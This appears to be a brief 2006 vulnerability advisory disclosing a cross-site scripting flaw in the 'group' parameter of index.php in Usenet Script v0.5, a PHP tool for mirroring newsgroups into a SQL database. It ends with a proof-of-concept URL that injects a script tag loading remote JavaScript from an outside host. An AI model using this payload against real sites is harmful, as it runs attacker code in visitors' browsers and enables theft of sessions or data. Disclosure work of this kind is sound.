Usenet Script v0.5

2006-06-27T00:00:00
ID SECURITYVULNS:DOC:13334
Type securityvulns
Reporter Securityvulns
Modified 2006-06-27T00:00:00

Description

Usenet Script v0.5

Homepage: http://www.metalhead.ws/usenet

Description:

"Those scripts allow you to mirror a Newsgroup in an SQL database. The development database was Postgresql, but it uses dbx and should therefore be able to work with other database systems, too. Furthermore, a frontend is provided."

Affected files:

index.php


XSS vuln via index.php on group var:

Data isnt properly sanatized before being generated. http://www.example.com/index.php?group=<script src=http://www.youfucktard.com/xss.js></script>